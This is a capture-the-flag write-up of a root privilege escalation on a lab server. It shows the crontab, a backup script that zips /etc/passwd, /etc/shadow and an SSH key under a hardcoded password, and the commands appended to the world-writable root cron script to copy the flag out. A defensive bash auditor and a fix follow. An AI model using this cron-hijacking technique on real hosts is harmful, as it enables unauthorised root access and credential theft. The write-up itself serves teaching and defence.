C&C Elevation (silver, 100p)

Great, now you have access to the hackers' command & control server.
But you probably need higher level access to find more valuable information.
Escalate privileges to root on the command & control server at 10.XX.32.130
and read the flag from /root/flag.txt


The README retrieved in C&C Access reveals information about custom scheduled tasks run via crontab.

# This share contains regular backups of our C&C server. #

Manual backups can be done by copying stuff to /share folder

For automated backups, specify a folder to back up in cronjob script.
/etc/crontab   - Cron jobs
/etc/backup.sh - Backup script running every minute.

DONE - B̶a̶c̶k̶u̶p̶ ̶p̶a̶s̶s̶w̶d̶ ̶a̶n̶d̶ ̶s̶h̶a̶d̶o̶w̶ ̶f̶i̶l̶e̶
DONE - P̶r̶o̶t̶e̶c̶t̶ ̶t̶h̶e̶ ̶c̶r̶e̶d̶z̶ ̶z̶i̶p̶ ̶f̶i̶l̶e̶ ̶w̶i̶t̶h̶ ̶p̶a̶s̶s̶w̶o̶r̶d̶
Set password to backup share!

Indeed, /etc/crontab defines a scheduled task, /etc/backup.sh, which is run by the root user every minute.

max@command_control_SRV1:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.


# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    /etc/backup.sh >/dev/null 2>&1

The file /etc/backup.sh contains the script that creates the credz_backup.zip seen previously.

max@command_control_SRV1:~$ cat /etc/backup.sh

# Back up the credentials for the system. Just in case max, change the passwords after initial testing
zip -e --password computer /share/credz_backup.zip -u /etc/passwd /etc/shadow /home/max/id_rsa

The file /etc/backup.sh is world-writable (mode -rwxrw-rw-), so any local user can modify a script that root runs every minute.

max@command_control_SRV1:~$ ls -al /etc/backup.sh
-rwxrw-rw- 1 root root 211 Oct 24 11:42 /etc/backup.sh

Append commands to /etc/backup.sh to make a copy of the flag.

max@command_control_SRV1:~$ echo >> /etc/backup.sh
max@command_control_SRV1:~$ echo "cat /root/flag.txt > /tmp/flag; chmod 777 /tmp/flag" >> /etc/backup.sh

Wait a minute for cron to run /etc/backup.sh as root, then read the flag from /tmp/flag.
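
From the defender's side, the misconfiguration used here is a root cron job whose script is writable by non-root users. The following is an added example, not part of the original write-up: a bash function that lists paths referenced by root entries in a system crontab that are group- or world-writable. The function name audit_root_cron, its PREFIX argument and the fixture (including rotate.sh) are assumptions made for illustration; it relies on GNU find and stat.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): report files and directories that
# root's system-crontab entries reference and that group or others can write to.

# audit_root_cron CRONTAB [PREFIX]
# PREFIX (assumption, for testing) is prepended to each path so the check can
# run against a fixture tree instead of the live filesystem.
audit_root_cron() {
    local crontab=$1 prefix=${2:-} path target
    # System crontab fields: m h dom mon dow user command...
    # Collect absolute paths from the command part of lines run as root.
    awk '!/^[ \t]*(#|$)/ && $6 == "root" {
             for (i = 7; i <= NF; i++) if ($i ~ /^\//) print $i
         }' "$crontab" | sort -u |
    while IFS= read -r path; do
        target=$prefix$path
        # -perm /022 matches when the group-write or other-write bit is set.
        if [ -n "$(find "$target" -maxdepth 0 \( -type f -o -type d \) -perm /022 2>/dev/null)" ]; then
            printf 'WRITABLE %s %s\n' "$(stat -c '%A' "$target")" "$path"
        fi
    done
}

# Constructed fixture mirroring the listing above: backup.sh is -rwxrw-rw-.
demo() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/etc"
    printf '#!/bin/sh\n' > "$root/etc/backup.sh"; chmod 766 "$root/etc/backup.sh"
    printf '#!/bin/sh\n' > "$root/etc/rotate.sh"; chmod 755 "$root/etc/rotate.sh"
    cat > "$root/etc/crontab" <<'EOF'
# m h dom mon dow user  command
* *     * * *   root    /etc/backup.sh >/dev/null 2>&1
0 3     * * *   root    /etc/rotate.sh
* *     * * *   max     /etc/backup.sh
EOF
    audit_root_cron "$root/etc/crontab" "$root"
    rm -rf "$root"
}
demo
```

On a live host the call would be audit_root_cron /etc/crontab with no prefix; the fix for a finding is to remove the group and other write bits (for example chmod 700) and keep the script owned by root.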